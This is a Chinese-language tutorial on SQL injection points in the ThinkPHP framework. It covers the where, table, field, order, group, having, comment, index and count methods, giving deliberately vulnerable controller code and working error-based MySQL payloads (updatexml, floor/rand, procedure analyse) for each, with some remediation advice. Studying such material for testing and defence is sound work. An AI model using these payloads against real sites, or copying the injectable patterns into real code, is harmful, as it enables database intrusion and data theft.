注入

一、where注入

1、语句

    /**
     * Demo action with a deliberate flaw: the `id` request parameter is
     * concatenated onto the string condition handed to where(), so whatever the
     * request carries becomes part of the SQL text instead of a value.
     */
    public function index(){
        $userModel = M('user');
        // Vulnerable on purpose: request input is glued onto the condition string.
        $row = $userModel->where('id=' . I('id'))->find();
        dump($row);
    }

2、报错注入

and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#

3、解决方案

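用数组条件查询,由框架处理取值的转义;不要把请求参数直接拼接进字符串条件。(数组条件只解决 where 取值的问题;下文的表名、字段别名、order、group 等属于标识符或 SQL 片段,无法按值转义,需要按白名单校验。)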

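    /**
     * Looks up User rows by the `id` request parameter using an array
     * condition, so the parameter reaches where() as a value rather than being
     * concatenated into the SQL text.
     */
    public function index(){
        $User = M("User");
        // The array form alone does not constrain the value's type, so coerce
        // the parameter to an integer before it reaches the query builder.
        // NOTE(review): assumes id is an integer key — confirm against the schema.
        $map = array('id' => I('id', 0, 'intval'));
        $User->where($map)->select();
    }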
		

二、table注入

1、语句

/**
 * Demo action with a deliberate flaw: the `tab` request parameter is passed
 * to table() unchanged, so the request decides which table name the query uses.
 * NOTE(review): a table name is an identifier, not a value; the usual defence
 * is to map the parameter onto a fixed list of permitted table names.
 */
public function index(){
      $model = M();
      // Vulnerable on purpose: request input is used as the table name.
      $model->table(I('tab'))->where('1=1')->find();
}


2、报错注入

where 1=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#

三、field注入

1、语句

/**
 * Demo action with a deliberate flaw: selects id and username, where the
 * alias given to username comes from the `name` request parameter.
 */
public function index(){
      $userModel = M('User');
      // `name` is the alias for username; because the alias is
      // caller-controlled, it is where the injection arises.
      // NOTE(review): an alias is an identifier — restrict it to a fixed set
      // of names rather than passing the request value through.
      $columns = array('id', 'username' => I('name'));
      $userModel->field($columns)->select();
}

2、报错注入

//字段别名可控,拼接语句
from thinkphp_user where 1=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#

四、order注入

1、语句

/**
 * Demo action with a deliberate flaw: the sort direction for `id` is taken
 * from the `orderby` request parameter and handed to order() unchanged.
 * NOTE(review): the direction should only ever be ASC or DESC; compare the
 * parameter against those two values before it reaches order().
 */
public function index(){
      $query = M('User')->where('1=1');
      // Vulnerable on purpose: the request value lands after ORDER BY `id`.
      $sortSpec = array('id' => I('orderby'));
      $query->order($sortSpec)->select();
}

SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) ORDER BY `id` a

2、报错注入

and (updatexml(1,concat(0x7e,(select user())),0))#

五、group注入

1、语句

    /**
     * Demo action with a deliberate flaw: the grouping expression comes from
     * the `id` request parameter and is handed to group() unchanged.
     * NOTE(review): a GROUP BY target is a column name; restrict it to a fixed
     * set of known columns instead of passing the request value through.
     */
    public function index(){
        $query = M('User')->field('max(id),username');
        // Vulnerable on purpose: request input becomes the GROUP BY clause.
        $rows = $query->group(I('id'))->select();
    }

SELECT max(id),`username` FROM `thinkphp_user` GROUP BY I('id')

2、报错注入

and (updatexml(1,concat(0x7e,(select user())),0))#

(select 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(user())),1,62)))a from information_schema.tables group by a)b)#


六、having注入

1、语句

//having,过滤I('id')参数
/**
 * Demo action with a deliberate flaw: both the grouping expression (`id`)
 * and the HAVING condition (`having`) come straight from request parameters.
 * NOTE(review): a HAVING clause is an SQL fragment; build it from fixed text
 * and validated values rather than accepting it whole from the request.
 */
public function index(){
	$query = M('User')->field('max(id),username');
	// Vulnerable on purpose: request input becomes the GROUP BY clause...
	$query = $query->group(I('id'));
	// ...and a second request value becomes the HAVING clause.
	$query = $query->having(I('having'));
	$rows = $query->select();
	dump($rows);
}

2、报错注入

(select 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(user())),1,62)))a from information_schema.tables group by a)b)#

七、comment注入

1、语句

/**
 * Demo action with a deliberate flaw: the text passed to comment() is taken
 * from the `com` request parameter unchanged.
 * NOTE(review): presumably the text is emitted inside an SQL comment, so a
 * comment terminator in the input would end it early — confirm against the
 * framework source; query comments should be fixed strings set by the code.
 */
public function index(){
	$userModel = M('User');
	// Vulnerable on purpose: request input is used as the query comment.
	$userModel->comment(I('com'))->where('1=1')->find();
}

2、报错注入

*/ procedure analyse(extractvalue(rand(),concat(0x3a,user())),1);# 

八、索引注入(thinkphp3版本不存在,thinkphp5.0存在)

1、语句

/**
 * Demo action with a deliberate flaw: the argument of force() is taken from
 * the `f` request parameter unchanged.
 * NOTE(review): presumably force() names the index to use; an index name is
 * an identifier and should be chosen from a fixed list in code — confirm.
 */
public function index(){
	$userModel = M('User');
	// Vulnerable on purpose: request input is used as the forced index.
	$rows = $userModel->force(I('f'))->select();
	dump($rows);
}

2、报错注入

) procedure analyse(extractvalue(rand(),concat(0x3a,user())),1);#

九、聚合方法

1、语句

    /**
     * Demo action with a deliberate flaw: the argument of the count()
     * aggregate is taken from the `f` request parameter unchanged.
     * NOTE(review): presumably the argument is the column placed inside
     * COUNT(...); restrict it to a fixed set of column names — confirm.
     */
    public function index(){
        $userModel = M('User');
        // Vulnerable on purpose: request input is used as the counted field.
        $total = $userModel->count(I('f'));
        dump($total);
    }

SELECT COUNT(*) AS tp_count FROM `thinkphp_user` LIMIT 1 

2、报错注入

*) AS tp_count FROM `thinkphp_user` where 1=1 and (updatexml(1,concat(0x7e,(select user())),0))#)
